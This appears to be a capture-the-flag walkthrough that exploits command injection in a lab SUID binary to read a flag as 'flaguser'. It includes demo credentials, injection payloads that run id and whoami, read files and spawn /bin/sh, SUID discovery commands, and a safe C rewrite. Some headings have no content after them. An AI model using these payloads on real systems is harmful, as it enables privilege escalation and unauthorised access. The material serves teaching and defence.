A secure file management system uses special privileged binaries to safely access system files, but when security meets convenience, vulnerabilities often emerge. 🎯 Can you discover how a helpful file reader becomes your gateway to elevated privileges? Time to hunt for those dangerous SUID bits and turn system administration tools against themselves! 🔍
SUID (Set User ID) is a special file permission that allows a program to run with the privileges of the file owner rather than the user executing it. When the SUID bit is set on an executable owned by root or another privileged user, it can become a powerful privilege escalation vector if the binary contains vulnerabilities.
# Check for SUID bit (s in owner execute position)
ls -la /usr/local/bin/file_reader
-rwsr-xr-x 1 root root 16832 Sep 8 12:00 /usr/local/bin/file_reader
Navigate to
Available Credentials:
guest, password: guest123
webuser, password: webpass123
Log in to the application using either set of credentials and explore the File Reader tool:
# Test normal file reading
File Path: /etc/passwd
# Expected output shows system users including flaguser
The SUID binary /usr/local/bin/file_reader contains a critical command injection vulnerability. Analysis of the binary reveals:
// Vulnerable C code in file_reader binary
snprintf(command, sizeof(command), "cat \"%s\"", argv[1]);
system(command);
// This directly concatenates user input into a system() call
Vulnerability Details:
# Inject additional commands
/etc/passwd; id
# Results in: cat /etc/passwd; id
# Executes both commands as flaguser
# Use command substitution
/etc/passwd; whoami
# Results in: cat /etc/passwd; whoami
# Shows current effective user (flaguser)
The most effective approach is to use command injection to execute commands as flaguser:
/etc/passwd"; cat /home/flaguser/flag.txt; echo "
How this works:
Input: /etc/passwd"; cat /home/flaguser/flag.txt; echo "
Resulting command: cat "/etc/passwd"; cat /home/flaguser/flag.txt; echo ""
The first " closes the quoted path the binary wraps around the input, the ; ends the cat command so the injected command runs, and the trailing echo " absorbs the closing quote the binary appends, so the shell sees balanced quotes and no syntax error.
# If you have shell access to the container
/usr/local/bin/file_reader "/etc/passwd; cat /home/flaguser/flag.txt"
# Expected output includes the flag
# Using pipes
/dev/null | cat /home/flaguser/flag.txt
# Results in: cat /dev/null | cat /home/flaguser/flag.txt
# Using && operator
/etc/passwd && cat /home/flaguser/flag.txt
# Executes second command if first succeeds
# Using background execution
/etc/passwd & cat /home/flaguser/flag.txt
# Runs commands in parallel
For more sophisticated attacks, you can use the SUID binary for various privilege escalation scenarios:
# Spawn a shell as flaguser
/etc/passwd; /bin/sh
# Note: This may not work in web interface
# but demonstrates the concept
# Explore flaguser's directory
/etc/passwd; ls -la /home/flaguser/
# Find additional sensitive files
The vulnerability exists because:
// VULNERABLE: Direct string concatenation in C
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
    char command[512];
    if (argc != 2) {
        fprintf(stderr, "usage: %s <file>\n", argv[0]);
        return 1;
    }
    // Untrusted argv[1] is spliced into a shell command line;
    // the surrounding quotes do not neutralise ", ;, |, && or &
    snprintf(command, sizeof(command), "cat \"%s\"", argv[1]);
    system(command); // DANGEROUS: Executes shell with user input
    return 0;
}
Key vulnerability factors:
Using Burp Suite for systematic testing:
In real penetration tests, you would first need to discover SUID binaries:
# Find all SUID binaries on the system
find / -type f -perm -4000 2>/dev/null
# Find SUID binaries owned by specific user
find / -type f -perm -4000 -user flaguser 2>/dev/null
# Check specific binary permissions
ls -la /usr/local/bin/file_reader
# Identify potentially vulnerable binaries
find / -type f -perm -4000 -exec ls -la {} \; 2>/dev/null | grep -E "(cat|less|more|tail|head|vim|nano)"
SUID binary vulnerabilities can lead to:
To prevent SUID binary vulnerabilities:
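The root fix for the file_reader code above is to never hand the path to a shell: open and copy the file directly, and confine it to an allowed directory. The following is an added example written for this page, not the challenge's binary; the cat_file name, the allowed_root prefix check and the /etc restriction in main are assumptions.

```c
#define _GNU_SOURCE   /* for realpath() under strict -std modes */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <limits.h>

/* Copy the file at user_path to out only if its canonical path lies under
 * allowed_root (assumed to be a directory other than "/"). Returns 0 on
 * success, -1 on refusal or error. The path never reaches a shell, so
 * "; id", "| cat" or "&&" are just characters in a file name. */
int cat_file(const char *allowed_root, const char *user_path, FILE *out)
{
    char root[PATH_MAX], real[PATH_MAX];

    /* Canonicalise both sides so symlinks and ".." cannot slip past the prefix check. */
    if (realpath(allowed_root, root) == NULL || realpath(user_path, real) == NULL)
        return -1;

    size_t rlen = strlen(root);
    if (strncmp(real, root, rlen) != 0 || (real[rlen] != '/' && real[rlen] != '\0'))
        return -1;

    FILE *in = fopen(real, "r");
    if (in == NULL)
        return -1;

    char buf[4096];
    size_t n;
    while ((n = fread(buf, 1, sizeof buf, in)) > 0) {
        if (fwrite(buf, 1, n, out) != n) {
            fclose(in);
            return -1;
        }
    }
    int err = ferror(in);
    fclose(in);
    return err ? -1 : 0;
}

/* Stand-alone use: file_reader <path>, restricted here to /etc (an assumption). */
int main(int argc, char *argv[])
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <file>\n", argv[0]);
        return 2;
    }
    return cat_file("/etc", argv[1], stdout) == 0 ? 0 : 1;
}
```

With this structure the payloads shown earlier on the page all fail the realpath() step, since no file by those names exists, and traversal such as /etc/../home/... is caught by the prefix check after canonicalisation.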
This challenge demonstrates:
The flag is stored at /home/flaguser/flag.txt and can be accessed by exploiting the command injection vulnerability in the SUID binary to execute commands as flaguser. The complete attack chain: Login → Access File Reader → Inject Commands → Escalate to flaguser → Read Flag.